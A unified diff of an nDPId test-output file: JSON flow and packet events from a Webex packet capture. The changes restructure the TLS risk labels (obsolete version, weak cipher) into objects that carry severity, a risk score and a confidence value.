 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1444570699916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570699916,"pkt":"ABoRAAACABoRAAABCABFAAA8M+lAAEAGPjwKCAABUEpuRIMPAbsBc+gmAAAAAKACOQj74QAAAgQFtAQCCAoATNvPAAAAAAEDAwY="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoA3lAABAGnsBQSm5ECggAAQG7gw\/+jBfZAXPoJ1AS\/\/9icAAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1444570699917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570699917,"pkt":"ABoRAAACABoRAAABCABFAAAoM+pAAEAGPk8KCAABUEpuRIMPAbsBc+gn\/owX2lAQOQgpaQAA"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00857{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570699916,"flow_last_seen":1444570699968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570699968,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"}
@@ -270,28 +271,28 @@
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00857{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
-00857{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"}
-00816{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00857{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}}
+00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
